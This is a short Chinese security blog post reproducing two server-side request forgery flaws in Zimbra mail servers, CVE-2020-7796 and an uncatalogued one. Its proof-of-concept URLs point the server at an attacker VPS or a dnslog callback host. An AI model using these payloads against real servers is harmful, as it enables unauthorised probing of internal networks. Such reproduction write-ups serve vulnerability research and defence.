Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

【漏洞复现】zimbra SSRF漏洞

渗透测试 Adminxe 6465℃ 0评论

1.CVE-2020-7796

该SSRF漏洞出现的脚本位于/zimlet/com_zimbra_webex/httpPost.jsp,不是所有的zimbra邮件服务器都开启了zimlet,因此CVE-2020-7796并不是通用的,POC代码如下:

/zimlet/com_zimbra_webex/httpPost.jsp?companyId=VPS的IP:port#

2.SSRF漏洞2(无CVE编号)

POC代码如下:

/service/error/sfdc_preauth.jsp?session=s&userid=1&server=vps的ip:port%23.salesforce.com/

验证:

https://xxx/service/error/sfdc_preauth.jsp?session=s&userid=1&server=https://zmftc4.dnslog.cn%23.salesforce.com/

使用dnslog作为验证SSRF,dnslog地址zmftc4.dnslog.cn

访问该链接:

https://xxxxx/service/error/sfdc_preauth.jsp?session=s&userid=1&server=https://zmftc4.dnslog.cn%23.salesforce.com/

再查看dnslog

12x.xxx.xxx.24为mail.xxxx.com的ip地址,由该IP发起的请求,说明存在SSRF漏洞

转载请注明:Adminxe's Blog » 【漏洞复现】zimbra SSRF漏洞

喜欢 (4)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址